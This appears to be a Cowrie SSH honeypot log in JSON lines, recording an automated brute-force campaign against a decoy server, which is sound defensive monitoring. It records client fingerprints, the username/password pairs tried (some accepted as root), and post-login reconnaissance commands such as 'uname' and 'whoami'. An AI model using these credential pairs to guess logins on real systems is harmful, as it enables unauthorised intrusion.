{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:27.173845Z","src_ip":"212.227.125.160","session":"58c96405e642"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57232,"dst_ip":"1.2.3.4","dst_port":22,"session":"8467e2b198ff","protocol":"ssh","message":"New connection: 212.227.125.160:57232 (1.2.3.4:22) [session: 8467e2b198ff]","sensor":"my-vps","timestamp":"2025-08-26T21:45:29.814770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:29.834937Z","src_ip":"212.227.125.160","session":"8467e2b198ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:29.906986Z","src_ip":"212.227.125.160","session":"8467e2b198ff"}
{"eventid":"cowrie.login.failed","username":"backuply","password":"backuply","message":"login attempt [backuply/backuply] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:30.369499Z","src_ip":"212.227.125.160","session":"8467e2b198ff"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:31.423608Z","src_ip":"212.227.125.160","session":"8467e2b198ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52620,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc553845c564","protocol":"ssh","message":"New connection: 212.227.125.160:52620 (1.2.3.4:22) [session: bc553845c564]","sensor":"my-vps","timestamp":"2025-08-26T21:45:35.419586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:35.423926Z","src_ip":"212.227.125.160","session":"bc553845c564"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:35.477198Z","src_ip":"212.227.125.160","session":"bc553845c564"}
{"eventid":"cowrie.login.failed","username":"sadmin","password":"sadmin","message":"login attempt [sadmin/sadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:35.697022Z","src_ip":"212.227.125.160","session":"bc553845c564"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:36.962991Z","src_ip":"212.227.125.160","session":"bc553845c564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48006,"dst_ip":"1.2.3.4","dst_port":22,"session":"c05aa413530a","protocol":"ssh","message":"New connection: 212.227.125.160:48006 (1.2.3.4:22) [session: c05aa413530a]","sensor":"my-vps","timestamp":"2025-08-26T21:45:41.212288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:41.226790Z","src_ip":"212.227.125.160","session":"c05aa413530a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:41.260165Z","src_ip":"212.227.125.160","session":"c05aa413530a"}
{"eventid":"cowrie.login.failed","username":"media","password":"media","message":"login attempt [media/media] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:41.457916Z","src_ip":"212.227.125.160","session":"c05aa413530a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:42.504948Z","src_ip":"212.227.125.160","session":"c05aa413530a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38090,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3db23ce8264","protocol":"ssh","message":"New connection: 212.227.235.229:38090 (1.2.3.4:22) [session: b3db23ce8264]","sensor":"my-vps","timestamp":"2025-08-26T21:45:45.445585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:46.311442Z","src_ip":"212.227.235.229","session":"b3db23ce8264"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:46.312151Z","src_ip":"212.227.235.229","session":"b3db23ce8264"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43392,"dst_ip":"1.2.3.4","dst_port":22,"session":"68cf65cc9b91","protocol":"ssh","message":"New connection: 212.227.125.160:43392 (1.2.3.4:22) [session: 68cf65cc9b91]","sensor":"my-vps","timestamp":"2025-08-26T21:45:46.767260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:46.809355Z","src_ip":"212.227.125.160","session":"68cf65cc9b91"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:46.852983Z","src_ip":"212.227.125.160","session":"68cf65cc9b91"}
{"eventid":"cowrie.login.failed","username":"linux","password":"linux","message":"login attempt [linux/linux] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:46.995803Z","src_ip":"212.227.125.160","session":"68cf65cc9b91"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:48.043953Z","src_ip":"212.227.125.160","session":"68cf65cc9b91"}
{"eventid":"cowrie.login.success","username":"root","password":"Onkar@123","message":"login attempt [root/Onkar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:45:50.498987Z","src_ip":"212.227.235.229","session":"b3db23ce8264"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:51.204878Z","src_ip":"212.227.235.229","session":"b3db23ce8264"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":10211,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab491878be9d","protocol":"ssh","message":"New connection: 212.227.125.160:10211 (1.2.3.4:22) [session: ab491878be9d]","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.471139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.472089Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38778,"dst_ip":"1.2.3.4","dst_port":22,"session":"474fa799e3a6","protocol":"ssh","message":"New connection: 212.227.125.160:38778 (1.2.3.4:22) [session: 474fa799e3a6]","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.473357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.497354Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.528157Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.596292Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.752521Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:45:52.932155Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.933100Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r%T","message":"login attempt [root/!Q2w#E4r%T] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.973360Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.985336Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:52.986281Z","src_ip":"212.227.125.160","session":"474fa799e3a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:45:53.244496Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T21:45:53.245288Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:53.371645Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:53.372972Z","src_ip":"212.227.125.160","session":"ab491878be9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34164,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dea7941c2d0","protocol":"ssh","message":"New connection: 212.227.125.160:34164 (1.2.3.4:22) [session: 7dea7941c2d0]","sensor":"my-vps","timestamp":"2025-08-26T21:45:57.661606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:45:57.662805Z","src_ip":"212.227.125.160","session":"7dea7941c2d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:45:57.706001Z","src_ip":"212.227.125.160","session":"7dea7941c2d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8890,"dst_ip":"1.2.3.4","dst_port":22,"session":"019aaaaae2a4","protocol":"ssh","message":"New connection: 212.227.235.229:8890 (1.2.3.4:22) [session: 019aaaaae2a4]","sensor":"my-vps","timestamp":"2025-08-26T21:45:57.870983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:45:57.872187Z","src_ip":"212.227.235.229","session":"019aaaaae2a4"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:57.891771Z","src_ip":"212.227.125.160","session":"7dea7941c2d0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:45:58.000196Z","src_ip":"212.227.235.229","session":"019aaaaae2a4"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T21:45:58.593490Z","src_ip":"212.227.235.229","session":"019aaaaae2a4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:58.950537Z","src_ip":"212.227.125.160","session":"7dea7941c2d0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:45:59.724592Z","src_ip":"212.227.235.229","session":"019aaaaae2a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57784,"dst_ip":"1.2.3.4","dst_port":22,"session":"69715e6f0d62","protocol":"ssh","message":"New connection: 212.227.125.160:57784 (1.2.3.4:22) [session: 69715e6f0d62]","sensor":"my-vps","timestamp":"2025-08-26T21:46:03.251773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:03.284494Z","src_ip":"212.227.125.160","session":"69715e6f0d62"}
